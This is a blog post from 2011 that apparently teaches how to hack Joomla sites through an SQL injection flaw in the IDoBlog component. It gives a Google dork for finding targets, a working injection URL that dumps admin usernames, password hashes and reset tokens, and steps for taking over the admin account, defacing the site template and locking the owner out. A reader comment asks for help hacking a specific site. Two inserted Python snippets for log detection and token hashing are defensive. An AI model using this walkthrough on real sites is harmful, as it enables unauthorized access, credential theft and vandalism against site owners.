
Joomla Hacking Tutorial

Posted on Wednesday, 9 November 2011 by Minhal Mehdi

    Introduction: Joomla! as a stable full package is probably unhackable, and
    anyone who says they HACKED Joomla is talking rubbish!!!
    So why do sites that use Joomla as their content management system still get hacked?
    Joomla is made of components and modules, and there are developers apart from
    the official team who offer their own solutions to improve Joomla.
    The components and modules made by those other developers are the weak spots!


    I hacked a site that used Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't say that I hacked Joomla!


    Finding Exploit And Target: These two steps can go in either order, depending on which you find first, the target or the exploit...


    Google dork: inurl:"option=com_idoblog"
    Comes up with results for about 140,000 pages



    Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vulnerability

    index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,​11,12,13,14,15,16+from+jos_users--


    The exploit can be separated into two parts:


    Part I
    index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
    This part opens the blog Admin page; if the Admin page doesn't exist, the exploit won't work (not completely confirmed)


    Part II
    +union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users--
    This part looks up the username and password in the jos_users table


    Testing Vulnerability

    Disable images for faster page loading:
    [Firefox]
    Tools >> Options >> Content (tab menu) >> and uncheck 'Load images automatically'


    Go to:
    http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
    Site loads normally...


    Go to:
    http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
    Site shows the blog Admin profile


    Go to:
    http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
    Site is vulnerable
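The requests above differ only in what follows `userid=`, which is what a defender can look for in web server access logs. The following added example (not part of the original post) flags requests to the component whose numeric parameters carry anything other than digits; the log lines are constructed samples and the function name `flag_injection_attempts` is made up for this illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameters that carry numeric IDs in the URLs shown in this post.
NUMERIC_PARAMS = ("userid", "Itemid")
DIGITS = re.compile(r"[0-9]+")
# Client IP and request target from a combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')


def flag_injection_attempts(log_lines, component="com_idoblog"):
    """Return (client_ip, param, decoded_value) for every request to the
    component whose numeric parameter holds anything other than digits."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qs percent-decodes and maps '+' to a space, so the plain and
        # encoded spellings of the same value are treated alike.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if component not in params.get("option", []):
            continue
        for name in NUMERIC_PARAMS:
            for value in params.get(name, []):
                if not DIGITS.fullmatch(value):
                    hits.append((ip, name, value))
    return hits


# Constructed sample log lines (hypothetical clients from documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Nov/2011:10:00:01 +0000] "GET /index.php?option=com_idoblog&view=idoblog&Itemid=22 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Nov/2011:10:00:09 +0000] "GET /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62 HTTP/1.1" 200 4890',
    '203.0.113.5 - - [09/Nov/2011:10:02:44 +0000] "GET /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1-- HTTP/1.1" 200 4890',
    '203.0.113.5 - - [09/Nov/2011:10:02:51 +0000] "GET /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62%20UNION%20SELECT%201-- HTTP/1.1" 200 4890',
    '192.0.2.9 - - [09/Nov/2011:10:05:00 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, name, value in flag_injection_attempts(SAMPLE_LOG):
        print(f"{ip}: non-numeric {name}={value!r}")
```

The same digits-only check, applied in the component before the value reaches the query, is the input validation whose absence the test request exposes.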


    Inject Target


    Open reiluke SQLiHelper 2.7
    In Target, paste:


    http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
    and click on Inject
    Follow the standard steps until you find Column Name; as a result we have


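    Notice that the exploit from inj3ct0r wouldn't work here because it looks for the jos_users table and, as you can see,
    our target uses the jos153_users table for storing data. The non-default table prefix stopped only the hard-coded query; the tool still found the table.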


    Let's dump username, email and password from jos153_users under Column Name. Click on Dump Now


    username: admin
    email: info@site.com
    password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI

    Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
    32 character salt that is appended to the end of the password string. The password is stored as 
    {TOTAL HASH}:{ORIGINAL SALT}. So cracking that password takes a lot of time...


    The easiest way to hack is to reset the Admin password!


    Admin Password Reset


    Go to:
    http://www.site.com/index.php?option=com_user&view=reset
    This is the standard Joomla! query for a password reset request



    The "Forgot your Password?" page will load.
    In E-mail Address, enter the admin email (in our case it is info@site.com) and press Submit.
    If you entered the right admin email, the "Confirm your account." page will load, asking for a Token:

    Finding Token

    To find the token, go back to reiluke SQLiHelper 2.7 and dump username and activation from jos153_users under Column Name

    username: admin
    activation: 5482dd177624761a290224270fa55f1d

    5482dd177624761a290224270fa55f1d is the 32-character verification token; enter it and press Submit.

    If you did everything correctly, the "Reset your Password" page will load. Enter your new password...
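The reset succeeds because the `activation` column holds the token in exactly the form the reset page accepts, so read access to the table is enough to take over the account. The following added example (not Joomla's code and not part of the original post) stores only a digest of the token plus an expiry time; the dict standing in for the user row, the field names and the 15-minute lifetime are assumptions made for this illustration.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60  # assumed lifetime; set according to policy


def issue_reset_token(user_row, now=None):
    """Create a reset token, keep only its SHA-256 digest and expiry in the
    user row, and return the raw token to be e-mailed to the account owner."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)  # about 256 bits of randomness
    user_row["reset_digest"] = hashlib.sha256(token.encode()).hexdigest()
    user_row["reset_expires"] = now + TOKEN_TTL_SECONDS
    return token


def redeem_reset_token(user_row, presented, now=None):
    """Return True only for the correct, unexpired token, and only once."""
    now = time.time() if now is None else now
    digest = user_row.get("reset_digest")
    if not digest or now > user_row.get("reset_expires", 0):
        return False
    candidate = hashlib.sha256(presented.encode()).hexdigest()
    # Constant-time comparison of the two hex digests.
    if not hmac.compare_digest(candidate, digest):
        return False
    user_row["reset_digest"] = None  # single use: clear after success
    return True


if __name__ == "__main__":
    row = {"username": "admin"}  # constructed stand-in for a database row
    emailed = issue_reset_token(row)
    # The value a database read would disclose is the digest, not the token.
    print("stored value accepted:", redeem_reset_token(row, row["reset_digest"]))
    print("e-mailed token accepted:", redeem_reset_token(row, emailed))
```

With this layout a dump of the users table yields a value the reset form rejects, and any token that is not used expires on its own.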

    After that go to:
    http://www.site.com/administrator/
    This is the standard Joomla content management portal

    Enter username admin and your password, click on Login
    Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
    In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

    To make the admin's life more miserable, click on admin in the main Joomla window and change the admin E-mail on the User Details page

    Share Links and Make this tutorial alive!!!
    Cheers! 

    4 comments:

    Anonymous said...

    Good One

    Anonymous said...

    can not understand

    Joomla Developers India said...

    Thanks for sharing, that’s gone into the long term memory bank

    Anonymous said...

    i will hack this site http://example.com but i can't hack it...

    and i look

    404 - Component not found

    You may not be able to visit this page because of:

    an out-of-date bookmark/favourite
    a search engine that has an out-of-date listing for this site
    a mistyped address
    you have no access to this page
    The requested resource was not found.
    An error has occurred while processing your request.

    Please try one of the following pages:

    Home Page

    If difficulties persist, please contact the System Administrator of this site and report the error below..

    Component not found



    so can you tell me how to hack this site
